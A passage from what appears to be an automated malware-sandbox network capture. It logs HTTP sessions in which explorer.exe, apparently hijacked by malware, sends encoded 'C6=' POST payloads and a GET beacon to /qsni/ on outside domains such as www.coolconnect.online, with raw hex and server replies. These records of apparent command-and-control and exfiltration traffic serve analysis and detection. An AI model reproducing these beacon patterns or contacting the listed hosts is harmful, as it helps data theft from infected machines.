                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>
                                                                                          Mar 30, 2023 10:24:50.859942913 CEST158INData Raw: 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72
                                                                                          Data Ascii: ...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http:/
                                                                                          Mar 30, 2023 10:24:50.859992027 CEST160INData Raw: 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                          Data Ascii: <ul> <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <
                                                                                          Mar 30, 2023 10:24:51.034153938 CEST160INData Raw: 65 61 72 63 68 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                          Data Ascii: earch</a> </div> </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right">


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          19192.168.2.649726185.134.245.11380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:56.145581961 CEST162OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.coolconnect.online
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.coolconnect.online
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.coolconnect.online/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 4a 66 68 48 4b 69 47 61 6d 6f 56 70 78 6c 78 64 59 64 39 61 69 6e 4a 2d 28 67 76 41 59 4d 65 50 41 61 47 77 55 4b 4c 71 6b 70 47 5a 28 59 5a 6b 55 61 6f 55 52 54 28 71 56 32 56 4c 79 54 57 6d 36 67 51 6a 30 30 48 72 49 44 36 38 72 76 28 30 30 43 44 43 70 43 33 46 75 37 37 45 41 4a 51 35 73 43 77 64 6e 4a 7a 55 76 49 4c 7a 72 34 6a 42 43 31 65 56 75 47 7a 44 6c 57 65 73 4e 78 41 6a 4c 61 4b 44 4d 6f 4f 4e 4c 4a 44 6f 77 33 30 67 78 30 56 52 57 6d 47 42 74 65 72 6a 42 6c 69 5a 72 4a 36 46 74 32 6c 5a 35 31 74 65 51 42 43 50 51 4d 73 48 38 7a 63 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=JfhHKiGamoVpxlxdYd9ainJ-(gvAYMePAaGwUKLqkpGZ(YZkUaoURT(qV2VLyTWm6gQj00HrID68rv(00CDCpC3Fu77EAJQ5sCwdnJzUvILzr4jBC1eVuGzDlWesNxAjLaKDMoONLJDow30gx0VRWmGBterjBliZrJ6Ft2lZ51teQBCPQMsH8zc.
                                                                                          Mar 30, 2023 10:24:56.189296961 CEST162INHTTP/1.1 405 Not Allowed
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:24:56 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 61 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a6<html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.649709145.239.252.4980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:23:51.507385969 CEST105OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.deconsurveys.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.deconsurveys.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.deconsurveys.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 62 32 30 54 37 50 61 38 64 4e 34 6d 47 79 67 4c 61 54 6b 54 37 28 61 64 51 5a 61 68 63 44 37 46 6a 42 4a 41 37 4e 6a 61 73 41 72 56 79 4c 39 35 43 75 61 63 4f 52 53 4b 46 32 56 4e 78 39 57 73 41 7a 66 6d 42 6c 76 28 48 43 4f 42 67 47 77 52 58 56 4a 42 43 77 65 28 43 76 70 52 54 34 39 51 70 62 7a 76 36 38 46 56 52 36 73 75 5f 6a 47 45 2d 76 57 44 36 4c 39 57 4e 30 44 49 53 4e 6f 7a 79 51 75 7a 4e 49 50 42 76 30 6b 64 6b 42 54 38 69 73 78 71 68 50 62 76 55 4f 4b 73 75 58 63 42 4c 39 51 50 51 55 54 72 67 73 78 33 73 61 75 32 48 4c 35 52 68 66 6d 4a 53 64 54 6c 5f 51 65 64 37 50 47 6a 43 65 41 6a 31 76 55 4b 2d 77 54 53 45 56 6a 38 6c 55 42 75 5a 79 54 50 36 53 45 44 58 61 2d 37 41 6d 50 51 4c 28 7a 52 71 34 48 46 55 6a 6b 78 74 52 4f 33 33 69 58 66 79 47 36 46 51 54 4f 6a 71 4a 57 61 37 38 43 57 2d 62 56 72 47 6e 69 28 43 33 49 4b 79 59 4c 6b 58 52 54 4d 4f 62 76 37 47 57 67 30 34 67 52 66 74 74 63 28 56 35 54 72 51 79 6a 47 42 43 31 6d 54 4d 5a 45 70 77 2d 52 6b 70 50 65 53 67 33 31 6d 42 4b 64 62 42 45 77 67 7e 33 4d 6d 4f 51 76 42 35 4d 78 41 51 53 65 47 53 55 57 72 52 51 48 66 6b 6a 71 64 55 32 6e 38 6f 50 39 75 65 54 4f 42 6c 33 34 71 50 6d 41 36 4c 36 28 76 56 30 41 72 49 63 41 73 66 68 36 42 70 4f 44 55 72 73 64 32 59 44 57 42 42 49 4b 52 50 55 51 42 69 43 58 52 34 45 68 35 4a 30 31 6e 6c 5f 4c 50 58 39 28 72 46 69 4b 72 6f 6e 5a 35 31 46 4d 36 48 36 52 6f 45 33 37 63 5a 49 5a 54 63 67 75 45 35 73 6a 51 72 76 7a 43 4e 56 51 35 61 55 51 35 39 6a 74 71 75 61 44 56 46 6f 32 46 4e 47 36 76 64 44 66 78 64 70 4d 52 33 49 38 7a 55 76 70 6d 54 61 55 70 39 48 63 4c 31 55 66 79 76 68 5a 4c 44 79 47 2d 30 75 61 73 61 37 57 35 6b 33 6f 74 58 2d 74 79 70 42 69 34 52 37 57 64 48 33 53 69 68 61 59 37 31 35 28 62 74 6c 35 4f 4d 6e 6b 77 58 39 73 72 57 67 33 42 4d 75 43 38 43 35 45 69 35 62 79 4b 36 72 4f 70 50 6d 4d 44 78 43 73 47 46 75 4e 7a 6b 48 74 75 77 5a 4f 36 66 2d 7e 63 4e 69 56 79 63 6d 43 54 63 30 53 69 4c 2d 28 72 6b 4a 6f 66 7e 69 64 57 63 4f 69 4e 6e 76 41 5f 32 50 54 54 49 69 28 41 6a 78 31 59 4f 51 64 74 7e 72 4a 45 42 4d 39 4b 33 74 42 31 79 37 6a 52 63 58 71 41 31 4f 6f 6f 28 6e 71 6a 6f 6f 66 68 71 2d 62 74 59 54 5a 69 75 75 59 52 64 61 43 52 7e 37 5a 4d 43 74 45 38 75 4b 4e 42 70 55 46 61 76 65 4a 57 73 69 4a 4c 6b 58 6f 76 50 58 4e 6d 46 55 61 35 7a 71 79 56 46 63 68 53 35 52 72 64 5a 4a 64 55 4b 49 33 76 73 46 67 52 50 59 73 45 70 4f 43 55 4d 32 56 43 69 6b 53 45 45 6f 4c 62 46 32 65 52 58 6f 6c 32 30 75 4e 47 4d 73 58 70 53 38 4e 6b 48 43 6b 50 61 6d 6f 67 4f 58 4a 4e 48 64 51 46 35 5a 44 42 7a 34 50 44 76 6f 30 77 59 30 63 4a 74 47 34 5f 32 49 69 65 69 4d 65 76 6f 7a 49 76 6e 56 6d 74 55 58 45 68 34 6e 4d 56 52 41 49 4d 51 4c 55 36 51 61 56 70 6e 45 35 49 43 41 56 4a 4a 6e 45 6c 73 57 56 49 6d 72 4d 41 79 32 64 61 63 62 4f 57 35 62 53 53 61 38 37 5a 6f 5a 56 50 6d 49 4f 36 64 6e 72 68 57 32 6d 55 6d 34 45 6e 33 55 4d 50 65 6a 58 4d 77 5f 67 69 4e 39 52 59 39 64 52 55 52 52 41 34 6e 6c 4f 36 4a 58 70 7a 73 44 37 74 7a 38 4f 37 50 68 73 56 38 36 4f 57 71 4b 32 6d 71 58 28 53 34 4c 42 71 69 71 70 68 43 46 41 65 7a 31 4f 55 4a 6b 55 4a 52 46 57 71 71 73 63 48 7a 76 43 4a 77 54 39 68 6a 73 52 5f 37 59 62 55 39 5a 54 6f 64 7a 4d 6d 6e 71 7a 6e 63 4d 78 5f 54 75 55 36 56 6f 77 55 74 2d 53 51 6e 59 68 37 58 50 44 35 34 79 77 52 44 50 77 30 66 45 28 6f 6c 65 69 78 72 72 47 31 44 44 31 61 49 56 78 6d 4e 5a 5a 5f 73 6a 30 58 45 38 38 77 33 55 72 69 50 5f 4c 5f 6a 66 44 54 59 70 69 56 34 50 7e 57 54 47 39 30 49 31 44 6e 78 53 69 72 57 6b 5a 5f 69 76 41 75 38 32 31 74 4b 7a 72 7a 77 45 50 78 72 30 32 38 31 2d 64 73 48 73 4f 78 45 5a 73 6f 75 58 63 4e 73 6f 35 41 56 58 69 73 46 4c 39 4e 67 52 34 74 4c 48 76 66 4e 64 71 5a 77 65 6b 66 62 71 59 57 7e 69 50 31 4a 55 78 30 55 33 63 44 38 72 5a 58 4e 57 56 34 62 42 35 4e 30 4e 36 72 56 6f 5a 62 66 57 32 6f 30 6e 51 41 70 68 7a 51 56 48 5a 36 7a 65 4f 54 30 76 51 49 53 37 51 70 6b 4e 65 64 63 4f 62 76 34 68 46 30 31 76 73 6e 69 33 66 46 64 76 65 49 65 37 32 46 35 67 79 5a 76 50 38 48 67 72 4b 35 4d 68 38 6b 41 78 55 6e 50 47
                                                                                          Data Ascii: C6=hhrrKzuTFil2Vb20T7Pa8dN4mGygLaTkT7(adQZahcD7FjBJA7NjasArVyL95CuacORSKF2VNx9WsAzfmBlv(HCOBgGwRXVJBCwe(CvpRT49Qpbzv68FVR6su_jGE-vWD6L9WN0DISNozyQuzNIPBv0kdkBT8isxqhPbvUOKsuXcBL9QPQUTrgsx3sau2HL5RhfmJSdTl_Qed7PGjCeAj1vUK-wTSEVj8lUBuZyTP6SEDXa-7AmPQL(zRq4HFUjkxtRO33iXfyG6FQTOjqJWa78CW-bVrGni(C3IKyYLkXRTMObv7GWg04gRfttc(V5TrQyjGBC1mTMZEpw-RkpPeSg31mBKdbBEwg~3MmOQvB5MxAQSeGSUWrRQHfkjqdU2n8oP9ueTOBl34qPmA6L6(vV0ArIcAsfh6BpODUrsd2YDWBBIKRPUQBiCXR4Eh5J01nl_LPX9(rFiKronZ51FM6H6RoE37cZIZTcguE5sjQrvzCNVQ5aUQ59jtquaDVFo2FNG6vdDfxdpMR3I8zUvpmTaUp9HcL1UfyvhZLDyG-0uasa7W5k3otX-typBi4R7WdH3SihaY715(btl5OMnkwX9srWg3BMuC8C5Ei5byK6rOpPmMDxCsGFuNzkHtuwZO6f-~cNiVycmCTc0SiL-(rkJof~idWcOiNnvA_2PTTIi(Ajx1YOQdt~rJEBM9K3tB1y7jRcXqA1Ooo(nqjoofhq-btYTZiuuYRdaCR~7ZMCtE8uKNBpUFaveJWsiJLkXovPXNmFUa5zqyVFchS5RrdZJdUKI3vsFgRPYsEpOCUM2VCikSEEoLbF2eRXol20uNGMsXpS8NkHCkPamogOXJNHdQF5ZDBz4PDvo0wY0cJtG4_2IieiMevozIvnVmtUXEh4nMVRAIMQLU6QaVpnE5ICAVJJnElsWVImrMAy2dacbOW5bSSa87ZoZVPmIO6dnrhW2mUm4En3UMPejXMw_giN9RY9dRURRA4nlO6JXpzsD7tz8O7PhsV86OWqK2mqX(S4LBqiqphCFAez1OUJkUJRFWqqscHzvCJwT9hjsR_7YbU9ZTodzMmnqzncMx_TuU6VowUt-SQnYh7XPD54ywRDPw0fE(oleixrrG1DD1aIVxmNZZ_sj0XE88w3UriP_L_jfDTYpiV4P~WTG90I1DnxSirWkZ_ivAu821tKzrzwEPxr0281-dsHsOxEZsouXcNso5AVXisFL9NgR4tLHvfNdqZwekfbqYW~iP1JUx0U3cD8rZXNWV4bB5N0N6rVoZbfW2o0nQAphzQVHZ6zeOT0vQIS7QpkNedcObv4hF01vsni3fFdveIe72F5gyZvP8HgrK5Mh8kAxUnPG4VAwhDYH8At7eeiqL1kh2rI7HXrszKScw318Xe5sGbWbgnsgqvFo2ryqY3MXkNit3KrFNu2T2lq4jtfLwnxLmj8.
                                                                                          Mar 30, 2023 10:23:51.538744926 CEST106INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:23:51 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          20192.168.2.649727185.134.245.11380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:58.717529058 CEST164OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.coolconnect.online
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.coolconnect.online
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.coolconnect.online/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 4a 66 68 48 4b 69 47 61 6d 6f 56 70 6a 57 5a 64 66 38 39 61 70 6e 4a 39 7a 41 76 41 4e 63 66 47 41 61 4b 77 55 50 36 78 6b 63 57 5a 28 4c 78 6b 55 5f 45 55 64 7a 28 71 58 32 56 50 32 54 58 74 36 67 46 59 30 32 50 42 49 42 57 38 70 4d 72 30 79 41 72 46 6d 53 33 48 71 37 37 46 41 4a 51 6f 73 47 73 5a 6e 4a 32 7a 76 49 54 7a 33 61 62 42 57 56 65 57 79 32 7a 44 6c 57 65 77 4e 78 42 43 4c 61 43 62 4d 73 69 64 49 5f 76 6f 77 58 55 67 33 56 56 4f 51 6d 47 46 75 65 71 4b 43 33 37 75 69 4b 53 47 6d 6d 4e 4e 6c 67 56 52 4b 42 76 4b 4e 65 51 39 6b 56 79 6c 34 5a 61 53 62 6e 65 43 50 6d 62 67 70 57 71 72 74 50 63 6c 4c 56 48 54 30 4f 4c 58 71 32 32 30 51 59 5a 49 63 6e 42 5f 6e 59 6d 70 70 34 6d 4f 4f 72 6e 49 45 46 70 66 41 64 44 56 48 66 7a 68 6c 39 35 76 56 6f 73 2d 41 54 37 5f 65 57 4a 4f 7e 37 73 48 35 31 6d 42 5a 31 6e 4c 30 4e 68 7a 51 69 4e 6b 6c 45 42 4a 71 5f 70 70 71 74 46 4f 44 71 46 4f 79 70 30 64 4e 65 65 6a 57 67 78 50 4f 42 47 56 63 75 4f 7a 53 7a 78 67 76 50 63 73 6f 6a 64 4f 48 76 62 32 5a 75 4f 71 38 4c 42 59 50 58 47 35 69 69 63 61 5a 55 6a 52 72 6a 6a 45 77 57 34 5f 31 74 6a 6f 41 61 43 6a 49 47 38 67 68 6b 6f 32 31 4c 67 5f 63 47 61 41 58 32 61 45 72 63 77 6d 34 41 34 50 66 39 4c 57 6e 31 38 49 37 35 37 78 7e 6f 52 67 49 4c 53 45 35 35 72 6c 75 55 6a 64 77 4a 31 4a 48 7a 77 42 55 4e 33 64 48 57 48 77 49 70 30 69 28 73 71 63 69 56 74 6f 59 4a 52 72 71 53 38 4a 68 57 47 52 75 69 42 48 4b 56 62 4f 36 71 6b 39 65 47 64 56 28 57 63 64 72 54 49 6e 6d 4f 4f 4b 65 7a 36 4c 70 71 6b 44 6b 2d 77 4f 6c 4a 41 73 31 4e 5a 44 4f 31 62 34 57 6c 75 65 6e 64 4e 38 6b 5a 4d 4b 65 45 66 67 6c 6f 4e 70 37 70 41 43 55 44 51 79 42 4f 4e 58 76 70 66 6e 79 76 32 6c 7a 45 70 6b 73 58 37 35 32 35 4e 6e 69 5f 76 42 54 6a 61 46 34 65 38 33 52 4c 47 61 63 39 68 74 61 44 56 6a 49 53 6b 68 30 4c 73 43 4c 34 63 4b 28 67 31 2d 50 31 7a 30 75 4d 4f 46 35 55 6a 59 71 4b 32 4a 71 43 4a 75 6c 48 62 42 41 44 4f 4a 57 31 75 34 76 4c 54 55 43 77 73 6e 35 41 6e 50 57 5f 54 62 58 36 59 46 7a 65 63 54 62 43 63 4a 34 76 64 6f 49 33 4e 5a 76 64 49 49 35 78 41 63 36 68 30 45 33 5f 4e 71 6e 4f 7e 79 78 68 7a 66 59 54 43 79 45 6a 48 67 79 75 43 67 38 78 4b 73 6c 79 68 4b 64 2d 6e 37 6c 55 6b 77 37 63 71 61 34 65 32 56 32 4b 33 4a 4c 5a 7a 53 37 47 48 41 4b 32 47 37 54 6d 6f 6d 4d 6d 28 4d 31 32 28 46 44 79 75 4c 64 58 71 37 37 79 59 4e 48 69 35 72 53 73 28 74 62 76 65 7a 76 43 70 37 70 6d 6f 2d 66 36 51 37 55 6f 32 6b 47 67 62 55 47 75 6a 59 70 69 46 78 4c 2d 67 4f 46 49 7a 6b 71 69 6a 54 44 53 63 2d 4c 77 4e 33 65 36 71 71 51 61 6f 77 6d 41 65 44 59 4e 4c 63 53 5a 45 59 42 33 6e 65 4c 46 69 6d 31 61 52 71 50 6a 55 2d 7e 64 41 46 52 66 69 66 6e 63 63 7a 47 45 6e 34 6c 30 54 37 4b 69 4a 6c 4a 47 4e 6e 71 48 57 38 49 51 31 51 34 69 36 51 6a 31 76 37 34 7a 58 34 6b 35 62 5f 38 76 6e 6b 54 49 6b 44 6e 44 30 75 35 72 37 6c 68 6c 58 78 57 52 7a 62 44 44 62 73 7e 75 62 62 63 4d 4e 66 4e 75 63 6c 38 69 6c 4b 69 49 7e 4f 49 63 38 46 45 52 45 69 57 44 52 6d 4b 66 35 75 49 76 46 79 52 68 73 6c 72 38 77 42 4b 56 36 66 59 53 28 74 68 74 53 62 48 6c 30 43 74 43 64 62 7e 78 38 6a 56 64 42 38 68 53 4b 6c 75 70 7a 69 76 41 44 44 64 43 49 37 44 45 46 54 7e 6f 75 5f 5a 68 55 63 55 47 4a 35 69 37 6e 47 49 6b 71 63 47 43 69 76 73 73 42 41 39 41 34 64 72 6d 4c 79 73 5a 66 6f 53 30 45 4c 77 57 4c 34 4d 64 32 2d 75 46 56 4b 6f 50 57 30 42 44 4f 41 32 61 49 4e 28 78 77 62 50 4f 46 69 28 4f 4d 47 65 72 55 31 57 5f 55 77 53 43 34 5f 71 58 68 57 6d 50 38 41 42 39 42 41 72 32 7e 38 75 39 4b 2d 6e 67 44 39 28 30 74 6f 4a 43 50 6d 65 75 57 67 69 79 58 66 48 42 68 2d 42 63 76 33 7e 74 6d 5a 30 61 4b 72 57 4b 37 63 39 4b 42 79 65 74 6f 73 62 62 7a 33 77 43 56 6a 36 68 45 50 37 44 77 7a 69 37 65 37 65 6e 45 6e 6c 51 4c 4b 50 68 34 2d 4c 51 62 37 52 47 47 63 45 61 72 76 66 45 58 51 36 77 43 6b 30 6b 76 7a 68 32 4a 6d 75 33 71 43 49 68 5a 33 6c 79 4b 4e 4f 57 68 39 56 2d 79 5a 36 6e 39 62 7a 56 75 52 57 41 33 49 6c 57 38 77 67 68 72 30 5a 63 70 63 56 38 76 4a 42 65 58 30 48 32 37 39 38 65 68 57 6c 37 63 5f 46 4d 37 45 65 7a 58 73 64 63 37 79 44 59 75 6e 65 34 36 4c 4f 4a 59 58
                                                                                          Data Ascii: C6=JfhHKiGamoVpjWZdf89apnJ9zAvANcfGAaKwUP6xkcWZ(LxkU_EUdz(qX2VP2TXt6gFY02PBIBW8pMr0yArFmS3Hq77FAJQosGsZnJ2zvITz3abBWVeWy2zDlWewNxBCLaCbMsidI_vowXUg3VVOQmGFueqKC37uiKSGmmNNlgVRKBvKNeQ9kVyl4ZaSbneCPmbgpWqrtPclLVHT0OLXq220QYZIcnB_nYmpp4mOOrnIEFpfAdDVHfzhl95vVos-AT7_eWJO~7sH51mBZ1nL0NhzQiNklEBJq_ppqtFODqFOyp0dNeejWgxPOBGVcuOzSzxgvPcsojdOHvb2ZuOq8LBYPXG5iicaZUjRrjjEwW4_1tjoAaCjIG8ghko21Lg_cGaAX2aErcwm4A4Pf9LWn18I757x~oRgILSE55rluUjdwJ1JHzwBUN3dHWHwIp0i(sqciVtoYJRrqS8JhWGRuiBHKVbO6qk9eGdV(WcdrTInmOOKez6LpqkDk-wOlJAs1NZDO1b4WluendN8kZMKeEfgloNp7pACUDQyBONXvpfnyv2lzEpksX7525Nni_vBTjaF4e83RLGac9htaDVjISkh0LsCL4cK(g1-P1z0uMOF5UjYqK2JqCJulHbBADOJW1u4vLTUCwsn5AnPW_TbX6YFzecTbCcJ4vdoI3NZvdII5xAc6h0E3_NqnO~yxhzfYTCyEjHgyuCg8xKslyhKd-n7lUkw7cqa4e2V2K3JLZzS7GHAK2G7TmomMm(M12(FDyuLdXq77yYNHi5rSs(tbvezvCp7pmo-f6Q7Uo2kGgbUGujYpiFxL-gOFIzkqijTDSc-LwN3e6qqQaowmAeDYNLcSZEYB3neLFim1aRqPjU-~dAFRfifncczGEn4l0T7KiJlJGNnqHW8IQ1Q4i6Qj1v74zX4k5b_8vnkTIkDnD0u5r7lhlXxWRzbDDbs~ubbcMNfNucl8ilKiI~OIc8FEREiWDRmKf5uIvFyRhslr8wBKV6fYS(thtSbHl0CtCdb~x8jVdB8hSKlupzivADDdCI7DEFT~ou_ZhUcUGJ5i7nGIkqcGCivssBA9A4drmLysZfoS0ELwWL4Md2-uFVKoPW0BDOA2aIN(xwbPOFi(OMGerU1W_UwSC4_qXhWmP8AB9BAr2~8u9K-ngD9(0toJCPmeuWgiyXfHBh-Bcv3~tmZ0aKrWK7c9KByetosbbz3wCVj6hEP7Dwzi7e7enEnlQLKPh4-LQb7RGGcEarvfEXQ6wCk0kvzh2Jmu3qCIhZ3lyKNOWh9V-yZ6n9bzVuRWA3IlW8wghr0ZcpcV8vJBeX0H2798ehWl7c_FM7EezXsdc7yDYune46LOJYXGtGIqXQUdVyjV_WEfG6bhtblm9angaHk6sp5X7eu4yxJb6n_kc2dhf8Ru3bHhni4Rv7jGPgytP9JFgJgwXCNsQ8.
                                                                                          Mar 30, 2023 10:24:58.761743069 CEST165INHTTP/1.1 405 Not Allowed
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:24:58 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 61 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: a6<html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          21192.168.2.649728185.134.245.11380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:25:01.283282995 CEST165OUTGET /qsni/?C6=EdJnJU/lhOYEhE9BO9NphGlO3QLRR4S2ZfetV970kfyK3r0VSOQZIVbRZ1Rh/wTR4QMpun6FHmi+ja6D1wHWvgz/qr6+Lt4m8nQxrZSCvu65&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.coolconnect.online
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:25:01.327152014 CEST167INHTTP/1.1 200 OK
